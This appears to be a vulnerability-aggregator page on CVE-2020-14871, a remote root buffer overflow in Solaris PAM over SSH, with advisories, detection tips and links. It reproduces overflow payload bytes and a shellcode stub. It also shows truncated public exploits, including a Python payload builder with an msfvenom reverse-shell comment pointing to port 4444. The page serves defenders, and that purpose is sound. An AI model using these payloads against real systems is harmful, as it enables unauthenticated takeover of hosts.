CVE-2020-14871
published 2020-10-21CVE-2020-14871: Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11…
PriorityP198critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
80.29%
99.6th percentile
Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | solaris | — | — |
| oracle | solaris | >= 10 < 11.1 | 11.1 |
| oracle_corporation | solaris_operating_system | — | — |
| oracle_corporation | solaris_operating_system | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
41*516 + \x04\x39\xbb\xfe\x19\xf8\xf0\x14\x01\x01\x04\x08\x07\xba\x05\x08\xd0\x56\xbb\xfe\xdf\x1e\xc2\xfe\x8c\x60\xfe\x56\xf1\xe3\xc3\xfe
bytes↗
\x31\xc0\x31\xc9\xbb\x01\x40\x04\x08\x66\xb8\x01\x40\xb1\x07\x4b\x48\x51\x50\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91 (mprotect stage-1 shellcode stub)
- →Monitor sshd_config for ChallengeResponseAuthentication or KbdInteractiveAuthentication set to 'yes' on Oracle Solaris 10/11.0 hosts — these settings enable the attack vector. ↗
- →The exploit prompt string 'Please enter user name:' in SSH keyboard-interactive sessions is the trigger point; monitor for oversized responses to this specific prompt. ↗
- →Post-exploitation: look for unexpected bind shells on ports 9999, 8080, or 4444 on Solaris hosts, consistent with shellcode payloads embedded in public PoC exploits for this CVE. ↗
- →The Metasploit module for this CVE targets SunSSH 1.1.5 on Solaris 10u11 1/13 (x86); correlate exploit attempts against this specific version string in SSH banners. ↗
- ·CVE-2020-14871 is NOT exploitable via SSH on Oracle Solaris 11.1 and later, because an unintentional change to the PAM library causes the username to be truncated before reaching parse_user_name(). The vulnerability in the function itself still exists in those versions. ↗
- ·ZFSSA 8.7 and later releases are also not exploitable; the NVD CVSS score is 0.0 for Solaris 11.1+ and ZFSSA 8.7+. ↗
- ·ROP chain addresses in public exploits are environment-dependent; the sysenter gadget address (0xfebbbbf4) was found to differ between VMware on MacOS vs. Windows hosts, meaning exploit reliability varies by hypervisor/host OS. ↗
- ·The vulnerability may affect other PAM implementations beyond Solaris (e.g., illumos), as the flaw is in the shared PAM library parse_user_name() function. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
cisa10.0CRITICAL
vendor_oracle10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7pcp-8fjh-246q: Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module)
ghsa_unreviewed·2022-05-24
CVE-2020-14871 [CRITICAL] CWE-787 GHSA-7pcp-8fjh-246q: Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module)
Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
VulnCheck
Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability
vulncheck·2020·CVSS 10.0
CVE-2020-14871 [CRITICAL] CWE-787 Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability
Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability
Oracle Solaris and Oracle ZFS Storage Appliance Kit contain an unspecified vulnerability causing high impacts to confidentiality, integrity, and availability of affected systems.
Affected: Oracle Solaris and Zettabyte File System (ZFS)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.mandiant.com/resources/blog/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/471415817e60; https://vulncheck.com/xdb/5164fb652cf7
Remediation Due: 2022-05-03
CISA
Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability
cisa·2021-11-03·CVSS 10.0
CVE-2020-14871 [CRITICAL] CWE-787 Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability
Vulnerability: Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability
Affected: Oracle Solaris and Zettabyte File System (ZFS)
Oracle Solaris and Oracle ZFS Storage Appliance Kit contain an unspecified vulnerability causing high impacts to confidentiality, integrity, and availability of affected systems.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-14871
Remediation Due Date: 2022-05-03
Oracle
Oracle Oracle Systems Risk Matrix: Pluggable authentication module — CVE-2020-14871
vendor_oracle·2020-10-15·CVSS 10.0
CVE-2020-14871 [CRITICAL] Oracle Oracle Systems Risk Matrix: Pluggable authentication module — CVE-2020-14871
Oracle Oracle Systems Risk Matrix: Pluggable authentication module vulnerability
CVE: CVE-2020-14871
CVSS: 10.0
Protocol: Multiple
Remote exploit: Yes
Affected versions: Network
Advisory: cpuoct2020 (OCT 2020)
No detection rules found.
Exploit-DB
Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
exploitdb·2021-06-21·CVSS 10.0
CVE-2020-14871 [CRITICAL] Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
---
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
# Exploit Author: Nathaniel Singer, Joe Rozner
# Date: 09/11/2020
# CVE: 2020-14871
# Vulnerable Version(s): Oracle Solaris: 9 (some releases), 10 (all releases), 11.0
# Description: CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6. The vulnerability received a CVSSv3 score of 10.0, the maximum possible score.
# Vendor Homepage: https://www.oracle.com/solaris
# Software Link: https://www.oracle.com/solaris/solaris10/downloads/solaris10-get-jsp-dow
Exploit-DB
Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
exploitdb·2021-05-21·CVSS 10.0
CVE-2020-14871 [CRITICAL] Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
---
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
# Original Exploit Author: Hacker Fantastic
# Metasploit Module Author: wvu
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
# Version: 10
# Tested on: SunOS solaris 10
# CVE: CVE-2020-14871
# Ported By: legend
import socket
import paramiko
from time import sleep
payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
payload+=b"python${IFS}-c${IFS}\""
# msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
payload+=b"exec(__import__('base64').b64decode(__import__('
Exploit-DB
Solaris SunSSH 11.0 x86 - libpam Remote Root
exploitdb·2020-12-15·CVSS 10.0
CVE-2020-14871 [CRITICAL] Solaris SunSSH 11.0 x86 - libpam Remote Root
Solaris SunSSH 11.0 x86 - libpam Remote Root
---
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root
# Exploit Author: Hacker Fantastic
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
# Version: 11
# Tested on: SunOS solaris 5.11 11.0
/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
* ====================================================================
* Makefile
* all: hfsunsshdx
*
* hfsunsshdx: main.c
* gcc main.c -o hfsunsshdx -lssh2
*
* clean:
* rm -rf hfsunsshdx
* rm -rf core.*
*
* A trivial to reach stack-based buffer overflow is present in libpam on
* Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
* which allocates a fixed size buffer of 512 bytes on the stack and parses
* usernames
Metasploit
Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow
metasploit
Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow
Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow
This module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary.
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Tenable
CVE-2020-14871: Critical Buffer Overflow in Oracle Solaris Exploited in the Wild as Zero-Day
blogs_tenable·2020-11-05·CVSS 10.0
[CRITICAL] CVE-2020-14871: Critical Buffer Overflow in Oracle Solaris Exploited in the Wild as Zero-Day
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://packetstormsecurity.com/files/159961/SunSSH-Solaris-10-x86-Remote-Root.htmlhttp://packetstormsecurity.com/files/160510/Solaris-SunSSH-11.0-x86-libpam-Remote-Root.htmlhttp://packetstormsecurity.com/files/160609/Oracle-Solaris-SunSSH-PAM-parse_user_name-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/163232/Solaris-SunSSH-11.0-Remote-Root.htmlhttp://www.openwall.com/lists/oss-security/2021/03/03/1http://www.openwall.com/lists/oss-security/2024/07/03/3https://www.oracle.com/security-alerts/cpuoct2020.htmlhttp://packetstormsecurity.com/files/159961/SunSSH-Solaris-10-x86-Remote-Root.htmlhttp://packetstormsecurity.com/files/160510/Solaris-SunSSH-11.0-x86-libpam-Remote-Root.htmlhttp://packetstormsecurity.com/files/160609/Oracle-Solaris-SunSSH-PAM-parse_user_name-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/163232/Solaris-SunSSH-11.0-Remote-Root.htmlhttp://www.openwall.com/lists/oss-security/2021/03/03/1http://www.openwall.com/lists/oss-security/2024/07/03/3https://www.oracle.com/security-alerts/cpuoct2020.htmlhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-14871
2020-10-21
Published
2021-11-03
Added to CISA KEV
Exploited in the wild